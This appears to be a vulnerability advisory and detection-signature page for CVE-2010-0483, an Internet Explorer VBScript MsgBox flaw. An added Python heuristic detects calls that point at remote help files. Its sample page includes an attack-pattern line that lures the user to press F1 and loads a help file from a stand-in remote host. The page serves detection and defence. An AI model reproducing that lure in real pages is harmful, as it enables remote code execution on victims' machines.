
Web Attack: IE VBScript CVE-2010-0483

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects attempts to exploit a remote code execution vulnerability in Microsoft Internet Explorer.

Additional Information

Microsoft Internet Explorer is a browser for the Windows operating system.

Internet Explorer is prone to a remote code execution vulnerability when handling the VBScript 'MsgBox()' function. Specifically, attackers can specify an external help file (through SMB or WebDAV) as a parameter to the message box. When a victim presses the 'F1' key while the message box is displayed, the attacker-supplied help file will execute with the permissions of the currently logged-in user.

Note that attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
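
A heuristic content check for the pattern described above, added here as an illustration; it is not Symantec's signature logic. It assumes the documented VBScript argument order MsgBox(prompt, buttons, title, helpfile, context), inspects only literal arguments (obfuscated or computed values are not handled), and uses hypothetical function names and a constructed sample page.

```python
import re

# VBScript: MsgBox(prompt[, buttons][, title][, helpfile, context])
MSGBOX = re.compile(r'\bMsgBox\b\s*\(?', re.IGNORECASE)
# A helpfile that starts with a UNC prefix (SMB/WebDAV) or an HTTP(S) URL is remote.
REMOTE = re.compile(r'^(\\\\|https?://)', re.IGNORECASE)

def split_args(text, start):
    """Split a VBScript argument list beginning at `start`, honouring "..." strings."""
    args, cur, in_str, depth = [], [], False, 0
    for ch in text[start:]:
        if ch == '"':
            in_str = not in_str          # a doubled "" toggles twice, so it stays in-string
            cur.append(ch)
        elif in_str:
            cur.append(ch)
        elif ch == ')' and depth == 0:
            break                        # end of the call's own parenthesis
        elif ch in '\r\n:':
            break                        # end of statement (paren-less call form)
        elif ch == ',' and depth == 0:
            args.append(''.join(cur).strip())
            cur = []
        else:
            depth += (ch == '(') - (ch == ')')
            cur.append(ch)
    args.append(''.join(cur).strip())
    return args

def remote_helpfiles(page):
    """Return the literal helpfile arguments of MsgBox calls that point off-host."""
    hits = []
    for m in MSGBOX.finditer(page):
        args = split_args(page, m.end())
        if len(args) >= 4 and REMOTE.match(args[3].strip('"')):
            hits.append(args[3].strip('"'))
    return hits

# Constructed sample page; host names use the reserved .test TLD.
SAMPLE = r'''
<script type="text/vbscript">
MsgBox "Saved.", 0, "Info"
MsgBox "Press F1 for help", 0, "Help", "\\files.example.test\pub\doc.hlp", 1
x = MsgBox("Local help", 1, "App", "C:\Windows\Help\app.hlp", 0)
</script>
'''

if __name__ == "__main__":
    for path in remote_helpfiles(SAMPLE):
        print("MsgBox with remote help file:", path)
```

Only the second call in the sample is reported; the local help file path and the three-argument call are ignored.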

NOTE: This document previously mentioned a buffer-overflow affecting 'winhlp32.exe'. That issue has been moved to BID 38473 (Microsoft Internet Explorer 'winhlp32.exe' 'MsgBox()' Stack-Based Buffer Overflow Vulnerability) to better document it.

Response

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.